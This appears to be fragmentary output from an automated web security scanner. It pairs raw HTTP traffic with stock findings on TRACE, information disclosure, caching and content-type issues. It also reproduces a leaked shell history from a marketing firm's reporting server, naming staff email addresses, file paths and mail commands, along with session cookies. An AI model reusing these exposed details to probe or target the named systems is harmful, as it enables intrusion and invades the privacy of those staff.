User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUknmntfmI4gkEaJqB02eiFjl3sHgDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMbAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GEGKFMwYGYCCjPrtWZknIfoBAsMbMQ--
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUBmuE9vQaUZPvGEt_WOLrL1FD0BkDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357TVwyA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAGbyFK; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:29:25 GMT; Path=/ Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript;charset=UTF-8 Content-Length: 4062 Date: Sun, 24 Apr 2011 12:29:24 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... <!-- Code auto-generated on Thu Apr 21 18:16:06 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634521&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F23%2Fdork%2Fnextadvisorcom%2Freflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html&dt=1303616551239&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303616551462&frm=0&adk=1607234649&ga_vid=1752949238.1303616552&ga_sid=1303616552&ga_hid=1192729809&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=783&xpc=7zsW6P0jZh&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 03:42:30 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12552
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 12:36:35 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 1814
GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 12:26:12 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 1838
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634845&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F23%2Fdork%2Fsecureidentityguardcom%2Fapache-mod-rewrite-off-by-one-buffer-overflow-vulnerability-dork-ghdb-poc-example-report.html&dt=1303616845243&bpp=5&shv=r20110414&jsv=r20110415&correlator=1303616845251&frm=0&adk=1607234649&ga_vid=2065049722.1303616845&ga_sid=1303616845&ga_hid=943068844&ga_fc=0&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=27&xpc=wncD24Liaw&p=file%3A// HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 03:47:23 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 6769
The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.
Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.
Issue remediation
The TRACE method should be disabled on the web server.
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
// =================================================================== // Author: Matt Kruse <matt@mattkruse.com> // WWW: http://www.mattkruse.com/ // // NOTICE: You may use this code for any purpos ...[SNIP]...
/* Prototype JavaScript framework * (c) 2005 Sam Stephenson <sam@conio.net> * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype web sit ...[SNIP]...
// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+ // Copyright (c) 2010 Jack Moore - jack@colorpowered.com // Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php (function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";func ...[SNIP]...
ELF..............>......'@.....@.......xN..........@.8...@.............@.......@.@.....@.@...............................................@.......@...............................................@..... ...[SNIP]... <%s>. .bug-coreutils@gnu.org.?.%*lu .%-*s .User name too long.Group name too long.cannot read symbolic link %s.%s %*s .%-32s . -> ...[SNIP]...
php index.php crontab -e ls ls -la ls -la ls -la ls -la perl ~/www/reporting/idguard/csv.pl ls -la php ~/www/reporting/idguard/transform.php ls -la ls -la php ~/www/reporting/idguard/transform.php ls ...[SNIP]... /reporting/idguard/transform.php ls -la php ~/www/reporting/idguard/transform.php ls -la uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com" ls cat test.csv php transform.php cat test.csv php transform.php ls -al ls -al php transform.php ls -al uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com" cat test.csv ls -al ../includes/ php transform.php uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com" cd ../allreports/ ls ls -al cd ../idguard/ cat test.csv |more php transform.php php transform.php php transform.php clear php transform.php uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com" cat test.csv |more cd ../allreports/ ls -la php run_yesterday_report.php chmod 777 allreports.csv rm allreports.csv php run_yesterday_report.php ls -al cat allreports.csv |more uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "All Reports - now with IDGuard" "roxane@nextadvisor.com" cd ../idguard/ ls ls -la cd ../ ls cd allreports/ ls ls -al rm allreports.csv php run_yesterday_report.php ls -al uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "All Reports - now with IDGuard" "roxane@nextadvisor.com" ls -al rm allreports.csv cd .. cd idguard/ ls ls php transform.php uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com" ls ls -al perl csv.pl ls -al php transform.php uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com" rm allreports.csv cd ../allreports/ rm allreports.csv vi run_yesterday_report_email_only_me.sh php run_yesterday_report.php ls ls -al uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "All Reports - now with IDGuard" "roxane@nextadvisor.com" vi run_yesterday_report.php vi run_yesterday_report.php vi run_yesterday_report_email_only_me.sh ls -al rm .run_yesterday_report_email_only_me.sh.swp rm ._run_yesterday_report_email_only_me.sh r ...[SNIP]...
php transform.php ls -al cd .. cd allreports/ php run_yesterday_report.php uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "roxane@nextadvisor.com" crontab -e ls -al rm .run_yesterday_report.sh.swp ls -al ../idguard/ ls -al ../idguard/ ls -al ../idguard/ crontab -e perl ~/www/reporting/idguard/csv.pl ls -al ls -al ../idguard/ rm ../idguard/test ...[SNIP]... /reporting/idguard/transform.php php ~/www/reporting/allreports/run_yesterday_report.php uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com" crontab -e crontab -e ls crontab -e php ~/www/reporting/idguard/transform.php ls ls -al crontab -e php ~/www/reporting/allreports/run_yesterday_report.php ls crontab -e ls ls uuencode ~/www/reporting/idguard/idguard.csv ~/www/reporting/idguard/idguard.csv | mail -s "IDGuard Reporting" "roxane@nextadvisor.com" crontab -e cd ../allreports/ ls ls -al crontab -e uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "roxane@nextadvisor.com" crontab -e cd ../idguard/ ls crontab -e perl ~/www/reporting/idguard/csv.pl php ~/www/reporting/idguard/transform.php php ~/www/reporting/allreports/run_yesterday_report.php uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "roxane@nextadvisor.com" cd www/reporting/allreports/ ls -al crontab -e ls -al crontab -e vi run_yesterday_report.php cd ../cj ls ls -al q! cd ../allreports/ php run_yesterday_report.php ls -al cat allreports.csv |more crontab -e ls -al ls -al crontab -e uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "angelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com" crontab -e cd ../idguard/ ls -al vi index.php crontab -e vi ../allreports/run_yesterday_report.php ls -al vi ../allreports/run_yesterday_report.php ls -al ls -al ls -al ls -al rm test.csv ls -al rm ...[SNIP]... al php ~/www/reporting/allreports/run_yesterday_report.php ls -al crontab -e uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "angelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com" cd cd /usr/local/apache/sites/jsp-test pwd ls -al cd jsp-test ls vi PageFour.jsp cd .. cp PageFour.jsp jsp-test/ sudo su cd www/reporting/ cd allreports/ ls -al crontab -e crontab -e cd www ls -al l ...[SNIP]... llreports/ mail cat allreports.csv |more crontab -e uuencode /home/roxane/www/reporting/allreports/allreports.csv /home/roxane/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "an gelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com" uuencode /home/roxane/www/reporting/allreports/allreports.csv /home/roxane/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "angelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com" ls -al ls -al ls -al ls -al ls -al ls -al ls -al ls -al ls -al ls -al ls -al ls -al ls -al ls -al crontab -e php run_yesterday_report.php cd ../onenetworkdirect/ ls -al cat ond.csv cd ../experian/ l ...[SNIP]...
crontab -e ls -al cat allreports.csv |more crontab -e uuencode /home/roxane/www/reporting/allreports/allreports.csv /home/roxane/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "angelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com" crontab -e ls -al crontab -e ls -al ls -al ls -al crontab -e crontab -e crontab -e crontab -e date cd www/reporting/allreports/ ls -al cat allreports.csv |more cd ../cj ls ls -al crontab -e ls -al cr ...[SNIP]... porting/allreports/run_yesterday_report.php crontab -e uuencode /home/roxane/www/reporting/allreports/allreports.csv /home/roxane/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "angelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com" ls-al ls -al cd www/reporting cd allreports/ ls cat allreports.csv |more crontab -e crontab -e date crontab -e crontab -e exit crontab -e cd /usr/local/apache cd sites/jsp-test ls -al rm -rf jsp-test ...[SNIP]...
/** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/li ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */
/** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) {
The following credit card numbers were disclosed in the response:
5565565565562780
5567785565560000
Issue background
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
Request
GET /documents/pci_dss_v2.pdf HTTP/1.1 Host: www.pcisecuritystandards.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.
The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
GET /robots.txt HTTP/1.0 Host: img.securepaynet.net
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/plain Last-Modified: Tue, 25 Nov 2008 19:40:48 GMT Accept-Ranges: bytes ETag: "d53d3eb7354fc91:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Date: Sun, 24 Apr 2011 12:43:34 GMT Connection: close Content-Length: 53
GET /robots.txt HTTP/1.0 Host: www.securepaynet.net
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sun, 24 Apr 2011 12:43:22 GMT Connection: close Content-Length: 81
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><script>(function(){var e=(new Date).getTime();var f=function(a,b){var c=document.crea ...[SNIP]...
<HTML> <HEAD> <TITLE>404 Not Found</TITLE> </HEAD> <BODY> <H1>Not Found</H1> The requested document was not found on this server. <P> <HR> <ADDRESS> Web Server at kroogy.com </ADDRESS> </BODY> </HTML> ...[SNIP]...
function AT_tags(){ try{var tags = new Array(); var imgs = new Array(); tags = ['http://spe.atdmt.com/images/pixel.gif','http://at.amgdgt.com/ads/?t=pp&px=2853&rnd=[cachebuster]','http:// ...[SNIP]...
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Apr 2011 12:10:01 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 42
The response contains the following Content-type statement:
Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain unrecognised content.
Request
GET /hcp/html/mTag.js?site=71003277 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/ManageBooking.asp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=16601209214853,d=1303177644
Response
HTTP/1.1 200 OK Content-Length: 17291 Content-Type: application/x-javascript Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71003277 Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT Accept-Ranges: bytes ETag: "e0f243e4cde1cb1:1a98" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Date: Sun, 24 Apr 2011 12:11:38 GMT
function AT_tags(){ try{var tags = new Array(); var imgs = new Array(); tags = ['http://spe.atdmt.com/images/pixel.gif','http://at.amgdgt.com/ads/?t=pp&px=2853&rnd=[cachebuster]','http:// ...[SNIP]...